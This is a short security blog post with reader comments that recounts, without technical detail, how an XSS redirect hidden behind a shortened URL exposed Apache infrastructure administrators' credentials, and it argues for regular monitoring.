How to be exposed via xss - in one click - just doing your job...

Friday, April 16, 2010

Jason Remillard


Cross posted from:

As the attacks on infrastructure become more complicated, the true nature of deep penetration attacks prove food for thought for all developers and operators.  Consider this case - where the apache open source infratructure itself became significantly exposed by a simple XSS attack that utilized some social engineering techniques (i.e. getting folks to click on things), to load others up with credentials.  After that, its off to the races!

In this case, a simple redirect hosted by a url shortening site exposed the clickers to a xss redirect, which then took the credentials of the clickee - in this case - administrators of some of the apache foundation infrastructure.  From there, the path takes a meandering journey through key infrastructure - up to and including source code repositories and support infrastructure.

To note as well, the captured initial credentials exposed other systems with cached credentials, cookies, etc.  Much like pulling on a thread, the intruders just had to keep pulling and following.   Of course, these guys knew what they were doing (turning off notifications for source code changes, which servers to go after, where to look, etc.)

Consider that they had several hours to monkey around within the infrastructure - before teams noticed the breach.  I recall an exposure several years ago where intruders had access for several months to key components of the ssh-key infrastructure.  As far as is documented, no major damage (modified file payloads, etc.) has been identified.  But this is a good example of why regular monitoring and scanning is important, especially in a multiple component distributed architecture.

As a side note - kudos to the apache team for a full, quick and detailed documentation of their exposure.  We all learn from this - and we're all richer for it.

Possibly Related Articles:
Vulnerabilities Webappsec->General
XSS Browser Security Web Application Security
Post Rating I Like this!
Fred Williams Interesting thing with the shortened URL used so much with Twitter and other sites: wouldn't it be a lot easier to trick users into going to malicious sites using shortened URLs?
Jason Remillard yes, thats basically what happened.. Except for this time, it was the administrators that clicked on the shortened URL, which did a XSS redirect (basically the real website with a little extra bit of siphon code). Bingo, you now have their creds, and they don't even know it! All from an innocuous 'support ticket'...

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.